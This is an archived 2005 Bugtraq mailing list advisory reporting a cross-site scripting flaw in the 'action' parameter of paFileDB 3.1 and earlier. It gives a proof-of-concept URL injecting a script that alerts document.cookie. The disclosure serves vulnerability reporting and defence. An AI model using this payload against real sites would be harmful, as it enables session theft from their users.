Bugtraq mailing list archives

Pafiledb ACTION Parameter XSS


From: tom cruise <the.n3t () gmail com>
Date: 8 Apr 2005 21:23:59 -0000




Vulnerable System : 
paFileDB 3.1
and less

exploit : 
http://[target]/pafiledb.php?action=";>&lt;script&gt;alert(document.cookie)&lt;/script&gt;

discovered by : neO 

SecurityGurus Team
www.securitygurus.net


Current thread: